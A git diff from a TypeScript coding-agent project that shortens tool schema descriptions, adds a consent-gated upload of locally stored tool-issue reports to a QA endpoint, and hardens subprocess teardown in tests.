`committer-date`.", - ) + .describe("date field") .default("created") .optional(), - limit: z - .number() - .default(10) - .describe("max results (search_issues, search_prs, search_code, search_commits, search_repos)") - .optional(), - run: z.string().describe("actions run id or url (run_watch)").optional(), - tail: z.number().default(15).describe("log lines per failed job (run_watch)").optional(), + limit: z.number().default(10).describe("max results").optional(), + run: z.string().describe("actions run id or url").optional(), + tail: z.number().default(15).describe("log lines per failed job").optional(), }) .strict(); diff --git a/packages/coding-agent/src/tools/hindsight-recall.ts b/packages/coding-agent/src/tools/hindsight-recall.ts index 856dd1f03..67d18df1b 100644 --- a/packages/coding-agent/src/tools/hindsight-recall.ts +++ b/packages/coding-agent/src/tools/hindsight-recall.ts @@ -6,7 +6,7 @@ import recallDescription from "../prompts/tools/recall.md" with { type: "text" } import type { ToolSession } from "."; const hindsightRecallSchema = z.object({ - query: z.string().describe("Natural language search query. Be specific about what you need to know."), + query: z.string().describe("natural language search query"), }); export type HindsightRecallParams = z.infer<typeof hindsightRecallSchema>; diff --git a/packages/coding-agent/src/tools/hindsight-reflect.ts b/packages/coding-agent/src/tools/hindsight-reflect.ts index ba4b99f04..d46e6e02b 100644 --- a/packages/coding-agent/src/tools/hindsight-reflect.ts +++ b/packages/coding-agent/src/tools/hindsight-reflect.ts @@ -6,8 +6,8 @@ import reflectDescription from "../prompts/tools/reflect.md" with { type: "text" import type { ToolSession } from "."; const hindsightReflectSchema = z.object({ - query: z.string().describe("The question to answer using long-term memory."), - context: z.string().describe("Optional additional context to guide the reflection.").optional(), + query: z.string().describe("question to answer"), + context: z.string().describe("optional context").optional(), }); export type HindsightReflectParams = z.infer<typeof hindsightReflectSchema>; diff --git a/packages/coding-agent/src/tools/hindsight-retain.ts b/packages/coding-agent/src/tools/hindsight-retain.ts index 088a85edb..e8dc37d50 100644 --- a/packages/coding-agent/src/tools/hindsight-retain.ts +++ b/packages/coding-agent/src/tools/hindsight-retain.ts @@ -7,16 +7,12 @@ const hindsightRetainSchema = z.object({ items: z .array( z.object({ - content: z - .string() - .describe("The information to remember. Be specific and self-contained — include who, what, when, why."), - context: z.string().describe("Optional context describing where this information came from.").optional(), + content: z.string().describe("information to remember"), + context: z.string().describe("source context").optional(), }), ) .min(1) - .describe( - "One or more memories to retain. Batch related facts in a single call rather than calling retain repeatedly — they are deduplicated and consolidated together.", - ), + .describe("memories to retain"), }); export type HindsightRetainParams = z.infer<typeof hindsightRetainSchema>; diff --git a/packages/coding-agent/src/tools/irc.ts b/packages/coding-agent/src/tools/irc.ts index 30d4a1bc9..b1f169ba6 100644 --- a/packages/coding-agent/src/tools/irc.ts +++ b/packages/coding-agent/src/tools/irc.ts @@ -26,18 +26,10 @@ import type { AgentRef, AgentRegistry } from "../registry/agent-registry"; import type { ToolSession } from "."; const ircSchema = z.object({ - op: z - .union([ - z.literal("send").describe("Send a message to one peer or to all peers"), - z.literal("list").describe("List currently visible peers"), - ]) - .describe("IRC operation"), - to: z.string().optional().describe('Recipient agent id (e.g. "0-Main", "0-AuthLoader") or "all" to broadcast'), - message: z.string().optional().describe("Message body to deliver"), - awaitReply: z - .boolean() - .optional() - .describe("Wait for the recipient's prose reply (default: true for DM, false for broadcast)"), + op: z.enum(["send", "list"]).describe("irc operation"), + to: z.string().optional().describe('recipient agent id or "all"'), + message: z.string().optional().describe("message body"), + awaitReply: z.boolean().optional().describe("wait for prose reply"), }); type IrcParams = z.infer<typeof ircSchema>; diff --git a/packages/coding-agent/src/tools/job.ts b/packages/coding-agent/src/tools/job.ts index 9782b8684..a4f811688 100644 --- a/packages/coding-agent/src/tools/job.ts +++ b/packages/coding-agent/src/tools/job.ts @@ -23,17 +23,9 @@ import { import { ToolError } from "./tool-errors"; const jobSchema = z.object({ - poll: z - .array(z.string()) - .optional() - .describe("background job ids to wait for; omit (with no `cancel`) to wait on all running jobs"), - cancel: z.array(z.string()).optional().describe("background job ids to cancel"), - list: z - .boolean() - .optional() - .describe( - "Return an immediate snapshot of every job spawned by this agent (running + completed within retention). Read-only \u2014 cannot be combined with `poll` or `cancel`.", - ), + poll: z.array(z.string()).optional().describe("job ids to wait for"), + cancel: z.array(z.string()).optional().describe("job ids to cancel"), + list: z.boolean().optional().describe("snapshot all jobs"), }); type JobParams = z.infer<typeof jobSchema>; diff --git a/packages/coding-agent/src/tools/report-tool-issue.ts b/packages/coding-agent/src/tools/report-tool-issue.ts index 2b0f26bf5..4a4018c41 100644 --- a/packages/coding-agent/src/tools/report-tool-issue.ts +++ b/packages/coding-agent/src/tools/report-tool-issue.ts @@ -1,34 +1,201 @@ /** * report_tool_issue — automated QA tool for tracking unexpected tool behavior. * - * Enabled when PI_AUTO_QA=1 or the dev.autoqa setting is on. + * Enabled by default; gated behind PI_AUTO_QA=1 / `dev.autoqa` so a user + * who flips the setting off short-circuits injection entirely. * Always injected into every agent (including subagents) regardless of tool selection. * Records grievances to a local SQLite database; never throws. + * + * Before the first record lands, the user's consent is checked. If they've + * never been asked (`dev.autoqa.consent === "unset"`) the process-global + * consent handler — wired by `InteractiveMode` to a Yes/No popup — is + * invoked exactly once and the decision is persisted. Subsequent calls + * (including from subagents) read the cached decision without prompting. + * + * When the user grants consent, push is automatically active against the + * bundled endpoint (`dev.autoqaPush.endpoint`, default `qa.omp.sh`). Each + * insert schedules a background flush that POSTs pending rows and deletes + * them on HTTP 2xx. `PI_AUTO_QA_PUSH=1` forces push in non-interactive + * environments where the consent dialog never fires. Tool execution is + * never blocked on the network and never throws. */ import { Database } from "bun:sqlite"; import path from "node:path"; import type { AgentTool } from "@oh-my-pi/pi-agent-core"; -import { $flag, getAgentDir, logger, VERSION } from "@oh-my-pi/pi-utils"; +import { $env, $flag, getAgentDir, getInstallId, logger, VERSION } from "@oh-my-pi/pi-utils"; import * as z from "zod/v4"; import type { Settings } from ".."; import type { ToolSession } from "./index"; const ReportToolIssueParams = z.object({ tool: z.string().describe("tool name"), - report: z.string().describe("unexpected behavior"), + report: z + .string() + .describe("unexpected behavior; generic, NEVER PII (paths, file contents, identifiers, prompt text)"), }); export function isAutoQaEnabled(settings?: Settings): boolean { return $flag("PI_AUTO_QA") || !!settings?.get("dev.autoqa"); } +// ─────────────────────────────────────────────────────────────────────────── +// Consent gate +// ─────────────────────────────────────────────────────────────────────────── + +/** + * Resolver for the user's "share grievances?" consent. + * + * Return values: + * - `true` — user agreed; record + ship for this run and persist. + * - `false` — user declined; suppress for this run and persist. + * - `null` — user dismissed the dialog (ESC, click-away, …) without + * picking an option. The decision is NOT cached or persisted, + * so the next `report_tool_issue` invocation re-prompts. + * + * Persistence is the tool's job (so subagent invocations can persist into + * the disk-backed `Settings` instance the host registered alongside the + * handler), not the handler's. Implementations live in hosts that have UI + * affordances — today only `InteractiveMode`. When no handler is + * registered (CLI subcommands, tests, non-interactive runs) consent + * defaults to `false` — the explicit "don't collect by default" stance. + */ +export type AutoQaConsentHandler = () => Promise<boolean | null>; + +let consentHandler: AutoQaConsentHandler | null = null; +/** + * Persistent settings instance supplied by the consent-handler registrant. + * Subagents have in-memory `Settings` snapshots that don't write to disk; + * we persist the decision through this disk-backed reference so a grant + * survives across runs even when triggered from a subagent tool call. + */ +let persistentConsentSettings: Settings | null = null; +/** + * Process-global cache of the resolved consent decision. Survives across + * subagent boundaries (subagents share this module instance), so a grant + * in the parent applies immediately to children — including children that + * spawned BEFORE the grant and would otherwise see a stale snapshot of + * `dev.autoqa.consent` in their isolated `Settings`. + * + * `null` = never asked, never cached. + */ +let cachedConsent: boolean | null = null; +/** + * Single-flight in-flight consent request. While the dialog is open, every + * concurrent `report_tool_issue` call (main + every subagent) awaits this + * promise instead of stacking duplicate popups. + */ +let consentInFlight: Promise<boolean> | null = null; + +/** + * Register the consent handler and the persistent {@link Settings} instance + * the decision should be written to. Passing `null` clears the handler + * (e.g. on `InteractiveMode` teardown). Re-registration is authoritative. + */ +export function setAutoQaConsentHandler( + handler: AutoQaConsentHandler | null, + persistentSettings: Settings | null = null, +): void { + consentHandler = handler; + persistentConsentSettings = persistentSettings; +} + +/** Test-only: clear consent cache + handler. Never call from production code. */ +export function __resetAutoQaConsentForTests(): void { + consentHandler = null; + persistentConsentSettings = null; + cachedConsent = null; + consentInFlight = null; +} + +function readPersistedConsent(settings: Settings | undefined): boolean | null { + if (!settings) return null; + const stored = settings.get("dev.autoqa.consent"); + if (stored === "granted") return true; + if (stored === "denied") return false; + return null; +} + +function persistConsent(localSettings: Settings | undefined, granted: boolean): void { + const value = granted ? "granted" : "denied"; + // Write on every settings instance we know about. The local one keeps + // the in-memory snapshot consistent for the current subagent; the + // persistent one (registered by the host) is what actually lands on disk. + for (const target of [localSettings, persistentConsentSettings]) { + if (!target) continue; + try { + target.set("dev.autoqa.consent", value); + } catch (error) { + logger.debug("autoqa consent persist failed", { error: String(error) }); + } + } +} + +/** + * Resolve the user's consent for `report_tool_issue` grievances. + * + * Precedence (highest first): + * 1. Process-global cache (set on first successful resolution). + * 2. Persistent setting (`dev.autoqa.consent` on the supplied `Settings`). + * 3. Persistent setting on the registered host `Settings`. + * 4. Consent handler popup (single-flight; persists the answer). + * 5. Default-deny when no handler is registered. + * + * Never throws — handler errors degrade to "denied for this call" without + * caching, so a subsequent invocation can re-prompt instead of being + * permanently locked into the false branch. + */ +export async function resolveAutoQaConsent(settings: Settings | undefined): Promise<boolean> { + if (cachedConsent !== null) return cachedConsent; + const persisted = readPersistedConsent(settings) ?? readPersistedConsent(persistentConsentSettings ?? undefined); + if (persisted !== null) { + cachedConsent = persisted; + return persisted; + } + if (!consentHandler) return false; + if (consentInFlight) return consentInFlight; + const handler = consentHandler; + consentInFlight = (async () => { + try { + const granted = await handler(); + if (granted === null) { + // User dismissed the dialog (ESC) without picking. Treat as + // "skip this call" but don't cache or persist — the next + // invocation gets to re-prompt so a stray ESC isn't a + // permanent opt-out. + return false; + } + cachedConsent = granted; + persistConsent(settings, granted); + return granted; + } catch (error) { + logger.warn("autoqa consent handler threw", { error: String(error) }); + return false; + } finally { + consentInFlight = null; + } + })(); + return consentInFlight; +} + export function getAutoQaDbPath(): string { return path.join(getAgentDir(), "autoqa.db"); } let cachedDb: Database | null = null; -function openDb(): Database | null { +/** + * Open (or return the cached handle for) the auto-QA SQLite database at + * `~/.omp/agent/autoqa.db`. Idempotently runs schema creation, the + * `pushed`-column migration, and index setup so every consumer — tool + * execute path, manual `omp grievances push`, future debug scripts — + * sees the same prepared schema. Returns `null` only on a hard open + * failure (filesystem permissions, etc.); a missing file is created. + * + * Exported because the `omp grievances` CLI handlers need the migrated + * handle too — having a second `openDb` in the CLI led to the column + * never being added on the manual-push path. + */ +export function openAutoQaDb(): Database | null { if (cachedDb) return cachedDb; try { const db = new Database(getAutoQaDbPath()); @@ -41,9 +208,22 @@ function openDb(): Database | null { model TEXT NOT NULL, version TEXT NOT NULL, tool TEXT NOT NULL, - report TEXT NOT NULL + report TEXT NOT NULL, + pushed INTEGER NOT NULL DEFAULT 0 ); `); + // Migration: pre-`pushed` databases get the column tacked on. Existing + // rows default to `0` (unpushed), so legacy grievances from before the + // consent + push pipeline went live get swept up by the next flush — + // exactly the behaviour we want for users who just granted consent. + const cols = db.prepare("PRAGMA table_info(grievances)").all() as Array<{ name: string }>; + if (!cols.some(c => c.name === "pushed")) { + db.run("ALTER TABLE grievances ADD COLUMN pushed INTEGER NOT NULL DEFAULT 0"); + } + // Speed up the per-batch `WHERE pushed = 0` scan that drives the flush + // loop. Without the index every batch becomes a full table scan once + // pushed rows dominate the table. + db.run("CREATE INDEX IF NOT EXISTS grievances_pushed_idx ON grievances(pushed, id)"); cachedDb = db; return db; } catch { @@ -51,6 +231,224 @@ function openDb(): Database | null { } } +// ─────────────────────────────────────────────────────────────────────────── +// Backend push +// ─────────────────────────────────────────────────────────────────────────── + +export interface FlushResult { + pushed: number; + ok: boolean; + skipped?: boolean; +} + +/** + * Optional per-flush controls. Used by `omp grievances push` to surface + * progress to a TTY and to skip the user-facing consent gate (manual + * pushes are the user's explicit intent, not a side effect of a tool call). + */ +export interface FlushOptions { + /** + * Skip the `dev.autoqa.consent === "granted"` gate in + * {@link resolvePushConfig}. Endpoint configuration is still required. + * Reserved for explicit user-driven pushes (CLI `grievances push`, + * future debug recipes); never set from the tool's auto-flush path. + */ + bypassConsent?: boolean; + /** + * Fires once at the start of the loop with the snapshot count of + * unpushed rows. Subsequent inserts won't be reflected (the count is + * a planning hint for progress reporters, not a live total). + */ + onStart?: (totalUnpushed: number) => void; + /** + * Fires after every successfully shipped batch with the running pushed + * count. Reporters compare against the `totalUnpushed` they saw in + * `onStart` to advance their bar. + */ + onProgress?: (pushedSoFar: number) => void; +} + +interface PushConfig { + endpoint: string; + token: string | undefined; +} + +const FLUSH_TIMEOUT_MS = 5_000; +const FAILURE_COOLDOWN_MS = 30_000; +/** + * Per-request batch size. The worker loops until no unpushed rows remain, + * shipping `FLUSH_BATCH_SIZE` rows per POST. Tunes the trade-off between + * request count and request size — 50 keeps each payload well under the + * default `maxBody` limit on the autoqa collector while letting a + * realistic backlog (a few hundred legacy rows on first flush after the + * consent grant) drain in single-digit requests. + */ +const FLUSH_BATCH_SIZE = 50; + +let inFlightFlush: Promise<FlushResult> | null = null; +let lastFailureAt = 0; + +/** Test-only: clear single-flight + cooldown state. Never call from production code. */ +export function __resetAutoQaFlushStateForTests(): void { + inFlightFlush = null; + lastFailureAt = 0; +} + +function envOverrideString(name: string): string | undefined { + const value = $env[name]; + if (typeof value !== "string") return undefined; + const trimmed = value.trim(); + return trimmed.length > 0 ? trimmed : undefined; +} + +function resolvePushConfig(settings: Settings | undefined, bypassConsent: boolean): PushConfig | null { + if (!isAutoQaEnabled(settings)) return null; + + // Consent IS the push opt-in for the auto-flush path. `bypassConsent` + // covers explicit user-driven pushes (`omp grievances push`) where the + // user clearly intends to ship regardless of dialog state. The + // `PI_AUTO_QA_PUSH` env flag stays as a CI/headless override too. + if (!bypassConsent) { + const consented = settings?.get("dev.autoqa.consent") === "granted"; + if (!consented && !$flag("PI_AUTO_QA_PUSH")) return null; + } + + const endpoint = envOverrideString("PI_AUTO_QA_PUSH_URL") ?? settings?.get("dev.autoqaPush.endpoint"); + if (!endpoint || endpoint.trim().length === 0) return null; + + const token = envOverrideString("PI_AUTO_QA_PUSH_TOKEN") ?? settings?.get("dev.autoqaPush.token"); + return { endpoint: endpoint.trim(), token: token && token.length > 0 ? token : undefined }; +} + +interface GrievanceRow { + id: number; + model: string; + version: string; + tool: string; + report: string; +} + +async function performFlush(db: Database, config: PushConfig, options: FlushOptions = {}): Promise<FlushResult> { + const selectStmt = db.prepare( + "SELECT id, model, version, tool, report FROM grievances WHERE pushed = 0 ORDER BY id ASC LIMIT ?", + ); + // Planning snapshot — fires once so progress reporters can size their bar. + // Mid-flight inserts are NOT folded in (the worker drains them too, but + // the progress bar treats the initial backlog as the denominator). + if (options.onStart) { + const totalRow = db.prepare("SELECT COUNT(*) AS n FROM grievances WHERE pushed = 0").get() as { n: number }; + options.onStart(totalRow.n); + } + let totalPushed = 0; + for (;;) { + const rows = selectStmt.all(FLUSH_BATCH_SIZE) as GrievanceRow[]; + if (rows.length === 0) return { pushed: totalPushed, ok: true }; + + const body = JSON.stringify({ + agent: { name: "omp", version: VERSION }, + installId: getInstallId(), + // Coarse host fingerprint for triage — `darwin`/`linux`/`win32` + + // `arm64`/`x64`. Useful for "is this bug arch-specific?" without + // leaking the user's machine name (the old payload sent + // `os.hostname()` verbatim, which trivially deanonymises users). + platform: process.platform, + arch: process.arch, + entries: rows, + }); + const headers: Record<string, string> = { "content-type": "application/json" }; + if (config.token) headers.authorization = `Bearer ${config.token}`; + + let response: Response; + try { + response = await fetch(config.endpoint, { + method: "POST", + headers, + body, + signal: AbortSignal.timeout(FLUSH_TIMEOUT_MS), + }); + } catch (error) { + lastFailureAt = Date.now(); + logger.warn("autoqa push failed", { + endpoint: config.endpoint, + error: String(error), + batchSize: rows.length, + pushedSoFar: totalPushed, + }); + return { pushed: totalPushed, ok: false }; + } + + if (!response.ok) { + lastFailureAt = Date.now(); + logger.warn("autoqa push failed", { + endpoint: config.endpoint, + status: response.status, + batchSize: rows.length, + pushedSoFar: totalPushed, + }); + return { pushed: totalPushed, ok: false }; + } + + // Mark just this batch — never touch ids the SELECT didn't return so a + // concurrent insert that landed mid-flight isn't claimed-as-shipped on + // our behalf. `id IN (?, ?, …)` rather than a range so a non-contiguous + // batch (after partial fills, retries, etc.) still flips exactly what + // we sent. + const ids = rows.map(r => r.id); + const placeholders = ids.map(() => "?").join(","); + db.prepare(`UPDATE grievances SET pushed = 1 WHERE id IN (${placeholders})`).run(...ids); + totalPushed += rows.length; + options.onProgress?.(totalPushed); + // Loop continues; the next SELECT picks up the next batch (or returns + // empty, exiting the loop). + } +} + +/** + * Flush queued grievances to the configured backend. + * + * Single-flight: concurrent callers share the in-flight promise. After a + * failed push, retries are skipped for {@link FAILURE_COOLDOWN_MS} ms. + * Never throws — all errors are caught and routed to the logger. + */ +export async function flushGrievances( + db?: Database, + settings?: Settings, + options: FlushOptions = {}, +): Promise<FlushResult> { + const config = resolvePushConfig(settings, options.bypassConsent === true); + if (!config) return { pushed: 0, ok: false, skipped: true }; + + // `bypassConsent` is the user's explicit "ship NOW" intent — skip the + // 30s cooldown window so they're not stuck looking at "skipped" after a + // transient failure. Auto-flush calls still cool off. + const bypass = options.bypassConsent === true; + if (!bypass && inFlightFlush) return inFlightFlush; + + if (!bypass && lastFailureAt > 0 && Date.now() - lastFailureAt < FAILURE_COOLDOWN_MS) { + return { pushed: 0, ok: false, skipped: true }; + } + + const handle = db ?? openAutoQaDb(); + if (!handle) return { pushed: 0, ok: false, skipped: true }; + + const promise = (async () => { + try { + return await performFlush(handle, config, options); + } catch (error) { + lastFailureAt = Date.now(); + logger.warn("autoqa push failed", { endpoint: config.endpoint, error: String(error) }); + return { pushed: 0, ok: false }; + } + })(); + + if (!bypass) inFlightFlush = promise; + try { + return await promise; + } finally { + if (!bypass) inFlightFlush = null; + } +} + export function createReportToolIssueTool(session: ToolSession): AgentTool { const getModel = () => session.getActiveModelString?.() ?? "unknown"; @@ -62,15 +460,40 @@ export function createReportToolIssueTool(session: ToolSession): AgentTool { parameters: ReportToolIssueParams, intent: "omit", async execute(_toolCallId, rawParams) { + // Save is unconditional: the row lives in the user's own SQLite + // at ~/.omp/agent/autoqa.db regardless of consent — they always + // own their local data and can inspect or wipe it via `omp grievances`. + // Consent only gates whether the row is *shipped* to the shared + // backend; that decision rides on `dev.autoqa.consent` and is + // enforced inside `flushGrievances` via `resolvePushConfig`. try { const params = rawParams as { tool: string; report: string }; - const db = openDb(); - db?.prepare("INSERT INTO grievances (model, version, tool, report) VALUES (?, ?, ?, ?)").run( - getModel(), - VERSION, - params.tool, - params.report, - ); + const db = openAutoQaDb(); + if (db) { + db.prepare("INSERT INTO grievances (model, version, tool, report) VALUES (?, ?, ?, ?)").run( + getModel(), + VERSION, + params.tool, + params.report, + ); + // Fire-and-forget background pipeline: + // 1. Trigger the consent popup if it hasn't been answered + // (single-flight inside `resolveAutoQaConsent`; subagents + // share the same module-level state). + // 2. Attempt a flush — `resolvePushConfig` no-ops when consent + // isn't granted, so a "no" leaves the row local for later + // `omp grievances push` or a future consent change. + // Tool execution returns immediately; the model never waits + // on the dialog. + void (async () => { + try { + await resolveAutoQaConsent(session.settings); + await flushGrievances(db, session.settings); + } catch (error) { + logger.debug("autoqa post-insert pipeline failed", { error: String(error) }); + } + })(); + } } catch (error) { logger.error("Failed to record tool issue", { error }); } diff --git a/packages/coding-agent/src/tools/resolve.ts b/packages/coding-agent/src/tools/resolve.ts index f48b9f0c0..a2e6c4423 100644 --- a/packages/coding-agent/src/tools/resolve.ts +++ b/packages/coding-agent/src/tools/resolve.ts @@ -12,14 +12,9 @@ import { replaceTabs } from "./render-utils"; import { ToolError } from "./tool-errors"; const resolveSchema = z.object({ - action: z.union([z.literal("apply"), z.literal("discard")]), + action: z.enum(["apply", "discard"]), reason: z.string().describe("reason for action"), - extra: z - .record(z.string(), z.unknown()) - .optional() - .describe( - 'Free-form metadata interpreted by the resolving tool (e.g. plan-mode approval requires `{ title: "<PLAN_TITLE>" }`).', - ), + extra: z.record(z.string(), z.unknown()).optional().describe("free-form metadata"), }); type ResolveParams = z.infer<typeof resolveSchema>; diff --git a/packages/coding-agent/src/tools/todo-write.ts b/packages/coding-agent/src/tools/todo-write.ts index c909519d8..ba9f8e56c 100644 --- a/packages/coding-agent/src/tools/todo-write.ts +++ b/packages/coding-agent/src/tools/todo-write.ts @@ -49,31 +49,24 @@ const TodoOp = z .describe("operation to apply"); const InitListEntry = z.object({ - phase: z.string().describe("phase name (short noun phrase)"), - items: z - .array(z.string().describe("task content (5-10 words)")) - .min(1) - .describe("tasks for this phase, in execution order; all start as pending"), + phase: z.string().describe("phase name"), + items: z.array(z.string().describe("task content")).min(1).describe("tasks for this phase"), }); const TodoOpEntry = z.object({ op: TodoOp, - list: z.array(InitListEntry).optional().describe("phased task list for op=init"), - task: z.string().optional().describe("task content for start/done/rm/drop/note"), - phase: z.string().optional().describe("phase name for done/rm/drop/append"), - items: z - .array(z.string().describe("task content (5-10 words)")) - .min(1) - .optional() - .describe("tasks to append to `phase` for op=append"), - text: z.string().optional().describe("note text for op=note (appended with newline)"), + list: z.array(InitListEntry).optional().describe("phased task list (init)"), + task: z.string().optional().describe("task content"), + phase: z.string().optional().describe("phase name"), + items: z.array(z.string().describe("task content")).min(1).optional().describe("tasks to append"), + text: z.string().optional().describe("note text"), }); const todoWriteSchema = z .object({ ops: z.array(TodoOpEntry).min(1).describe("ordered todo operations"), }) - .describe("Apply ordered todo operations"); + .describe("apply ordered todo operations"); type TodoWriteParams = z.infer<typeof todoWriteSchema>; type TodoOpEntryValue = TodoWriteParams["ops"][number]; diff --git a/packages/coding-agent/src/web/search/index.ts b/packages/coding-agent/src/web/search/index.ts index 47b74cd1e..58f6147d2 100644 --- a/packages/coding-agent/src/web/search/index.ts +++ b/packages/coding-agent/src/web/search/index.ts @@ -21,12 +21,12 @@ import { SearchProviderError } from "./types"; /** Web search tool parameters schema */ export const webSearchSchema = z.object({ - query: z.string().describe("Search query"), - recency: z.enum(["day", "week", "month", "year"]).describe("Recency filter (Brave, Perplexity)").optional(), - limit: z.number().describe("Max results to return").optional(), - max_tokens: z.number().describe("Maximum output tokens").optional(), - temperature: z.number().describe("Sampling temperature").optional(), - num_search_results: z.number().describe("Number of search results to retrieve").optional(), + query: z.string().describe("search query"), + recency: z.enum(["day", "week", "month", "year"]).describe("recency filter").optional(), + limit: z.number().describe("max results").optional(), + max_tokens: z.number().describe("max output tokens").optional(), + temperature: z.number().describe("sampling temperature").optional(), + num_search_results: z.number().describe("number of search results").optional(), }); export type SearchToolParams = z.infer<typeof webSearchSchema>; diff --git a/packages/coding-agent/test/acp-stdout-hygiene.test.ts b/packages/coding-agent/test/acp-stdout-hygiene.test.ts index 97d37532e..c9e1cc74e 100644 --- a/packages/coding-agent/test/acp-stdout-hygiene.test.ts +++ b/packages/coding-agent/test/acp-stdout-hygiene.test.ts @@ -10,21 +10,73 @@ import * as fs from "node:fs"; import * as os from "node:os"; import * as path from "node:path"; +type AcpProc = Bun.Subprocess<"pipe", "pipe", "pipe">; + const repoRoot = path.resolve(import.meta.dir, "..", "..", ".."); const cliEntry = path.join(repoRoot, "packages", "coding-agent", "src", "cli.ts"); const cleanupRoots: string[] = []; -let activeProc: ReturnType<typeof Bun.spawn> | undefined; +let activeProc: AcpProc | undefined; + +/** + * Tear the child down hard. SIGTERM first so the process gets a chance to + * unwind, but force-kill quickly if it hasn't reaped — `omp acp` blocks on + * stdin reads and won't notice SIGTERM until we close the pipes. We bound + * the entire shutdown to ~2s so a stuck child never trips Bun's 5s hook + * timeout (which is what produced the "afterEach hook timed out" flakes). + */ +async function teardown(proc: AcpProc): Promise<void> { + // Close stdin so any blocking read in the child wakes up. + try { + proc.stdin.end(); + } catch { + // already closed + } + // Best-effort detach from stdout/stderr so the child's pipe writes don't + // block on a full buffer once we stop draining. + for (const stream of [proc.stdout, proc.stderr] as Array<ReadableStream<Uint8Array> | undefined>) { + if (!stream) continue; + try { + await stream.cancel(); + } catch { + // reader may already be detached + } + } + + try { + proc.kill("SIGTERM"); + } catch { + // already exited + } + + // Race the natural exit against a short grace, then escalate to SIGKILL + // and race again against a hard cap. `await proc.exited` after SIGKILL + // always returns promptly on Darwin/Linux. + const graceMs = 200; + const hardCapMs = 1500; + const exited = proc.exited; + const raced = await Promise.race([ + exited.then(() => "exited" as const), + Bun.sleep(graceMs).then(() => "grace" as const), + ]); + if (raced === "exited") return; + try { + proc.kill("SIGKILL"); + } catch { + // already exited between the SIGTERM and SIGKILL + } + await Promise.race([exited, Bun.sleep(hardCapMs)]); +} afterEach(async () => { if (activeProc) { - try { - activeProc.kill(); - await activeProc.exited; - } catch { - // ignore - } + const proc = activeProc; activeProc = undefined; + try { + await teardown(proc); + } catch { + // teardown is already best-effort; never let cleanup fail a test + } } for (const root of cleanupRoots.splice(0)) { await fs.promises.rm(root, { recursive: true, force: true }); @@ -53,13 +105,16 @@ describe("ACP stdout hygiene", () => { it("emits a JSON-RPC initialize response as the first bytes on stdout", async () => { const root = await fs.promises.mkdtemp(path.join(os.tmpdir(), "omp-acp-stdout-")); cleanupRoots.push(root); - const home = path.join(root, "home"); const xdg = path.join(root, "xdg"); const agentDir = path.join(root, "agent"); - await fs.promises.mkdir(home, { recursive: true }); await fs.promises.mkdir(xdg, { recursive: true }); await fs.promises.mkdir(agentDir, { recursive: true }); + // NOTE: we intentionally do NOT override HOME. Bun keys its transpile + // cache at `$HOME/.bun/install/cache`; pointing HOME at a fresh tmp + // dir forces a full re-transpile of the CLI's module graph on every + // run (~12s cold vs ~0.4s warm). XDG_* and PI_CODING_AGENT_DIR + // already isolate PI's on-disk state for this smoke test. const proc = Bun.spawn(["bun", cliEntry, "acp"], { cwd: repoRoot, stdin: "pipe", @@ -67,15 +122,38 @@ describe("ACP stdout hygiene", () => { stderr: "pipe", env: { ...process.env, - HOME: home, XDG_DATA_HOME: xdg, XDG_CONFIG_HOME: xdg, PI_CODING_AGENT_DIR: agentDir, PI_NO_TITLE: "1", + NO_COLOR: "1", }, }); activeProc = proc; + // Buffer stderr in the background so we can assert no JSON-RPC frame + // leaks onto it. The pump exits the moment stderr closes, which + // happens during teardown — we never wait on it from the test body. + const stderrChunks: Uint8Array[] = []; + const stderrPump = (async () => { + const reader = proc.stderr.getReader(); + try { + while (true) { + const { value, done } = await reader.read(); + if (done) break; + if (value) stderrChunks.push(value); + } + } catch { + // reader cancelled by teardown — expected + } finally { + try { + reader.releaseLock(); + } catch { + // already released + } + } + })(); + const initRequest = { jsonrpc: "2.0", id: 1, @@ -85,27 +163,7 @@ describe("ACP stdout hygiene", () => { proc.stdin.write(new TextEncoder().encode(`${JSON.stringify(initRequest)}\n`)); proc.stdin.flush(); - // Capture stderr in parallel so we can verify it does not carry any - // JSON-RPC frame. ACP owns stdout; banners, progress text, or stray - // protocol bytes on stderr indicate a misroute. - const stderrChunks: Uint8Array[] = []; - const stderrPump = (async () => { - const reader = (proc.stderr as ReadableStream<Uint8Array>).getReader(); - try { - while (true) { - const { value, done } = await reader.read(); - if (done) break; - if (value) stderrChunks.push(value); - // Stop once the first stdout frame arrives so the pump terminates - // alongside the test rather than waiting for process exit. - if (stderrChunks.length > 32) break; - } - } finally { - reader.releaseLock(); - } - })(); - - const firstLine = await readFirstFrame(proc.stdout as ReadableStream<Uint8Array>); + const firstLine = await readFirstFrame(proc.stdout); expect(firstLine.length).toBeGreaterThan(0); expect(firstLine[0]).toBe("{"); @@ -126,18 +184,19 @@ describe("ACP stdout hygiene", () => { ]), ); - // Terminate the process so the stderr pump promise resolves. Race with a - // short timeout in case stderr is empty (common path). - try { - proc.kill(); - } catch { - // process may already be exiting - } - await Promise.race([stderrPump, new Promise(resolve => setTimeout(resolve, 500))]); - const stderrText = new TextDecoder().decode(new Uint8Array(stderrChunks.flatMap(chunk => Array.from(chunk)))); - // Guard against JSON-RPC frames sneaking onto stderr. We allow normal - // stderr output (warnings, telemetry, etc.) but reject anything that - // parses as a JSON-RPC envelope on the wrong channel. + // First frame is good. Tear the child down now so the test body's + // wall time is bounded by "boot + first frame", not by waiting for + // stderr or a delayed shutdown. teardown() closes stdin/stdout/stderr + // and escalates SIGTERM→SIGKILL, which both stops the child and + // resolves stderrPump. + await teardown(proc); + activeProc = undefined; + await stderrPump; + + const stderrText = Buffer.concat(stderrChunks).toString("utf8"); + // Guard against JSON-RPC frames sneaking onto stderr. Normal stderr + // output (warnings, telemetry, etc.) is allowed, but anything that + // parses as a JSON-RPC envelope on the wrong channel is a misroute. for (const line of stderrText.split("\n")) { const trimmed = line.trim(); if (!trimmed.startsWith("{")) continue; diff --git a/packages/coding-agent/test/agent-session-concurrent.test.ts b/packages/coding-agent/test/agent-session-concurrent.test.ts index 1b0ca8f71..71f21ef13 100644 --- a/packages/coding-agent/test/agent-session-concurrent.test.ts +++ b/packages/coding-agent/test/agent-session-concurrent.test.ts @@ -64,14 +64,15 @@ describe("AgentSession concurrent prompt guard", () => { const stream = new AssistantMessageEventStream(); queueMicrotask(() => { stream.push({ type: "start", partial: createAssistantMessage("") }); - const checkAbort = () => { - if (abortSignal?.aborted) { - stream.push({ type: "error", reason: "aborted", error: createAssistantMessage("Aborted") }); - } else { - setTimeout(checkAbort, 5); - } - }; - checkAbort(); + if (abortSignal) { + abortSignal.addEventListener( + "abort", + () => { + stream.push({ type: "error", reason: "aborted", error: createAssistantMessage("Aborted") }); + }, + { once: true }, + ); + } }); return stream; }, @@ -110,11 +111,7 @@ describe("AgentSession concurrent 